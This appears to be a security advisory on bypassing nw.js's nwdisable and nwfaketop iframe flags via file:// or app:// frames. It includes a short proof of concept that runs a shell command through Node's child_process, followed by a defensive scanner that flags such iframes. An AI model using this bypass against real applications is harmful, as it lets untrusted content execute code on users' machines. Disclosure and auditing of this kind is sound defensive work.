Code execution in nw.js: bypassing nwdisable in file:// and app:// frames

It’s possible to bypass the nwdisable and nwfaketop flags by nesting iframes inside a top-level sandboxed iframe that uses file:// or app://.

Proof of concept

<!doctype html>
    <meta charset="utf-8">
    <title>Testing nwfaketop and nwdisable</title>
    <iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html" nwdisable nwfaketop></iframe>
    <script>
      // Run a shell command through Node's child_process and show its output
      var exec = require('child_process').exec;
      exec('uname -a', function (error, stdout, stderr) { alert(stdout); });
    </script>

<iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html"></iframe>
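
A defensive check based on the above, as an added example that is not part of the original advisory: it scans an app's HTML for iframes that rely on nwdisable or nwfaketop while loading a file:// or app:// document, the case described here as bypassable. The function names and the sample markup are assumptions made for illustration.

```javascript
// Added audit example (not from the original advisory).
// Flags <iframe> tags that rely on nwdisable / nwfaketop while loading a
// file:// or app:// document. Relative src values are not resolved here.

const RISKY_SCHEMES = ['file:', 'app:'];
const SANDBOX_FLAGS = ['nwdisable', 'nwfaketop'];

// Parse the attributes of one opening <iframe> tag into a name -> value map.
function parseAttributes(tag) {
  const attrs = Object.create(null);
  const body = tag.replace(/^<iframe\b/i, '').replace(/\/?>$/, '');
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Return one finding per iframe that combines a sandbox flag with a risky scheme.
function findRiskyFrames(html) {
  const findings = [];
  const tagRe = /<iframe\b(?:"[^"]*"|'[^']*'|[^>"'])*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[0]);
    const flags = SANDBOX_FLAGS.filter((f) => f in attrs);
    const src = (attrs.src || '').trim().toLowerCase();
    const scheme = RISKY_SCHEMES.find((s) => src.startsWith(s + '//'));
    if (flags.length > 0 && scheme) {
      const line = html.slice(0, m.index).split('\n').length;
      findings.push({ line, src: attrs.src, flags, scheme });
    }
  }
  return findings;
}

// Constructed sample markup; paths and hosts are placeholders.
const SAMPLE = [
  '<!doctype html>',
  '<iframe src="file:///opt/example-app/untrusted.html" nwdisable nwfaketop></iframe>',
  "<iframe src='APP://example-app/widget.html' nwdisable></iframe>",
  '<iframe src="https://example.com/page.html" nwdisable nwfaketop></iframe>',
  '<iframe src="file:///opt/example-app/trusted.html"></iframe>',
].join('\n');

console.log(findRiskyFrames(SAMPLE));
```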